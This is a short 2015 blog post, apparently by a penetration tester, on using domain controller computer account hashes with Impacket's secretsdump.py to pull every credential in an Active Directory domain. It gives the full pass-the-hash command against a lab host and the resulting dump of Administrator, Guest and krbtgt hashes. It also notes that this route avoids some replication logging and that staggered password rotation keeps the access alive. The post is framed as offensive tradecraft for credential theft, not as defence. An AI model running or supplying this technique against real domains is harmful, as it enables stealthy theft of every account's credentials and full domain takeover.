Using Domain Controller Account Passwords To HashDump Domains

2015-09-15 371 words 2 minutes

Contents

Since I follow both Carlos Perez and Benjamin Delpy on Twitter, something caught my eye on August 2nd, soon after Benjamin Delpy drops DCSync:

@Carlos_Perez haha, if yes, it will be a 0d ;)
No, like always it needs some rights ;) DA is cool, maybe DC$ is enough
— 🥝🏳️‍🌈 Benjamin Delpy (@gentilkiwi) August 2, 2015

And then later on August 28th, again about the DC$ account (Domain Controller computer account):

#mimikatz DCSync make logs with 'Directory Service Access' DS-Replication-Get-Changes*
Except if you use a DC account pic.twitter.com/QAChOGU3z7
— 🥝🏳️‍🌈 Benjamin Delpy (@gentilkiwi) August 28, 2015

Because DCSync is calling on “sync” based APIs of Active Directory, that are, by default, used only by Domain Controllers, all Domain Controller computer accounts would have the ability to do this as well as the Domain/Enterprise Admins.

Anyone who’s ever administered an Active Directory, knows that computer accounts change their passwords automatically. How often do they change them?

https://support.microsoft.com/en-us/kb/154501:

“Machine account passwords are regularly changed for security purposes. By default, on Windows NT-based computers, the machine account password automatically changes every seven days. Starting with Windows 2000-based computers, the machine account password automatically changes every 30 days.”

PSSSST!! That article is about how to DISABLE automatic password changing

Alright. So, I’m not going to go into “how” to get the hashes for a computer account, but if you’ve ever dumped passwords before, the computer accounts are the ones with the “$” on the end. Find the ones that are domain controllers, match up the hashes, and use Impacket’s secretsdump.py to your heart’s content. (Or until the password changes for that DC, then you use another one to dump it again, oh, did I not mention that computers don’t change their passwords all at the same time in that 30 day window?)

Remember, Domain Controller’s don’t have a lot of other permissions, so you need to use the “-just-dc” option in SecretsDump in order for it to just do the domain dump:

1
2
3
4
5
6
7
8
9


python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc LAB/DC2k8_1\$@172.16.102.15

Impacket v0.9.14-dev - Copyright 2002-2015 Core Security Technologies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Happy #HackersDay